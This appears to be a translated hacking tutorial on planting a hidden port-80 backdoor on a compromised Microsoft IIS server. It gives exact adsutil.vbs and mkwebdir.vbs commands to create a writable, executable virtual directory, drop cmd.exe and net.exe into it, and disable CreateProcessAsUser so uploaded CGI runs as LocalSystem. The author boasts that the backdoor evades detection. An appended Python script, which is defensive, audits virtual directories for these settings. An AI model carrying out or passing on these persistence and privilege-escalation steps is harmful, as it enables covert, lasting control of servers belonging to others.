IIS is a very popular WWW server, and it has no shortage of vulnerabilities. After compromising an IIS server, you leave a backdoor so that you can control it at any time. The usual backdoor programs open a special port and listen on it; NC, NTLM, RNC and the like all listen on the server side for a remote connection and hand out telnet-style control. However, a relatively strictly protected WWW site (one whose administrator has already been burned once) generally restricts ports with a firewall, so that nothing can connect to any port except the ones the administrator allows. But port 80 cannot be closed (unless the administrator has taken the wrong medicine). So we can leave the backdoor on port 80 and keep it open forever.
When IIS starts a CGI application, it uses the CreateProcessAsUser API by default to create the new CGI process, so the process runs as the user who started the CGI. Anonymous users are generally mapped to the IUSR_Computername account, which the administrator can of course change to another user, or a legitimate user can be supplied by the browser. That user's permissions are relatively low; it may well be a member of the Guests group. In fact, we can modify the way IIS launches the CGI to raise these permissions: the IIS main process itself runs under the LocalSystem account, so we can obtain the highest LocalSystem privilege.
After compromising a web server, one generally binds a CMD to a port to control the server remotely. This can be GUI remote control such as 3389, or text-mode control such as Telnet or RNC. NC is definitely available, and in fact it is enough.
1. Telnet to the server
2. cscript.exe adsutil.vbs enum w3svc/1/root
KeyType                         : (STRING) "IIsWebVirtualDir"
AppRoot                         : (STRING) "/LM/W3SVC/1/Root"
AppFriendlyName                 : (STRING) "Default Application"
AppIsolated                     : (INTEGER) 2
AccessRead                      : (BOOLEAN) True
AccessWrite                     : (BOOLEAN) False
AccessExecute                   : (BOOLEAN) False
AccessScript                    : (BOOLEAN) True
AccessSource                    : (BOOLEAN) False
AccessNoRemoteRead              : (BOOLEAN) False
AccessNoRemoteWrite             : (BOOLEAN) False
AccessNoRemoteExecute           : (BOOLEAN) False
AccessNoRemoteScript            : (BOOLEAN) False
HttpErrors                      : (LIST) (32 Items)
  "400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
  "401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
  "401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
  "401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
  "401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
  "401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
  "403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
  "403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
  "403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
  "403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
  "403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
  "403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
  "403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
  "403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
  "403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
  "403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
  "403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
  "403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
  "403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
  "403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
  "403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
  "403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
  "404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
  "405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
  "406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
  "407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
  "412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
  "414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
  "500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
  "500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
  "500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
  "500,100,URL,/iisHelp/common/500-100.asp"
FrontPageWeb                    : (BOOLEAN) True
Path                            : (STRING) "C:\Inetpub\wwwroot"
AccessFlags                     : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]
Don't tell me you don't know what the output above means!!!
Now we already have a terminal on the box, don't we! Haha, the administrator is in for some bad luck.
3. mkdir C:\Inetpub\wwwroot\dir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","C:\Inetpub\wwwroot\dir1"
This creates a virtual directory named Virtual Dir1.
You can check it with the enum command from step 2.
5. Next, change the properties of Virtual Dir1 to allow execute:
cscript.exe adsutil.vbs set "w3svc/1/root/virtual dir1/accesswrite" "true" -s:
cscript.exe adsutil.vbs set "w3svc/1/root/virtual dir1/accessexecute" "true" -s:
Now you can upload content to this directory and run it. You can also copy cmd.exe and net.exe directly into the physical disk directory behind the virtual directory.
6. The following command modifies the IIS metabase so that IIS no longer goes through CreateProcessAsUser when it creates the new CGI process, which, as explained above, leaves the CGI running in the LocalSystem context of the IIS process itself:
cscript adsutil.vbs set /w3svc/1/root/[Your Directory]/CreateProcessAsUser false
Note: cscript is the Windows Script Host, adsutil.vbs is the Windows IIS administration script, and what follows them is the IIS metabase path.
Such a backdoor is almost impossible to find unless every virtual directory is inspected (if the administrator has already written his suicide note, then he will go and check them).
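That inspection is exactly what an administrator can script. The following added example (not part of the original article) parses the "Name : (TYPE) value" lines that adsutil.vbs enum prints for each virtual directory and flags the two settings the steps above rely on: AccessWrite and AccessExecute both True, and CreateProcessAsUser explicitly set to False. The sample output embedded below is constructed; the virtual directory paths and values are hypothetical.

```python
import re
from typing import Dict, List

# Constructed sample: what "cscript adsutil.vbs enum <vdir path>" prints for two
# virtual directories. Paths and values are hypothetical, not from a real host.
SAMPLE_ENUM_OUTPUT = {
    "/w3svc/1/root/scripts": """KeyType                         : (STRING) "IIsWebVirtualDir"
Path                            : (STRING) "C:\\Inetpub\\Scripts"
AccessRead                      : (BOOLEAN) False
AccessWrite                     : (BOOLEAN) False
AccessExecute                   : (BOOLEAN) True
""",
    "/w3svc/1/root/virtual dir1": """KeyType                         : (STRING) "IIsWebVirtualDir"
Path                            : (STRING) "C:\\Inetpub\\wwwroot\\dir1"
AccessRead                      : (BOOLEAN) True
AccessWrite                     : (BOOLEAN) True
AccessExecute                   : (BOOLEAN) True
CreateProcessAsUser             : (BOOLEAN) False
""",
}

# One adsutil property line: "Name : (TYPE) value"; list items and [child keys] do not match.
PROP_RE = re.compile(r'^(\w+)\s*:\s*\((\w+)\)\s*(.*)$')

def parse_adsutil(text: str) -> Dict[str, object]:
    """Turn adsutil enum output into a dict, converting BOOLEAN and INTEGER values."""
    props: Dict[str, object] = {}
    for line in text.splitlines():
        m = PROP_RE.match(line.strip())
        if not m:
            continue
        name, typ, raw = m.groups()
        if typ == "BOOLEAN":
            props[name] = raw.strip().lower() == "true"
        elif typ == "INTEGER":
            props[name] = int(raw)
        else:
            props[name] = raw.strip().strip('"')
    return props

def audit_vdir(path: str, props: Dict[str, object]) -> List[str]:
    """Return findings for one virtual directory; an empty list means nothing suspicious."""
    findings = []
    if props.get("AccessWrite") and props.get("AccessExecute"):
        findings.append(f"{path}: AccessWrite and AccessExecute are both True (upload-and-run)")
    # An explicit False overrides the inherited default, so the CGI runs as LocalSystem.
    if props.get("CreateProcessAsUser") is False:
        findings.append(f"{path}: CreateProcessAsUser explicitly set to False")
    return findings

def audit_all(outputs: Dict[str, str]) -> List[str]:
    """Audit every captured vdir; feed it the real enum output of each directory."""
    findings: List[str] = []
    for path, text in outputs.items():
        findings.extend(audit_vdir(path, parse_adsutil(text)))
    return findings
```

In practice the dictionary would be filled by running adsutil.vbs enum over each path returned by the step 2 listing; only the "virtual dir1" sample trips both checks here.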
Nobody may use this for illegal attacks; everything is at your own risk.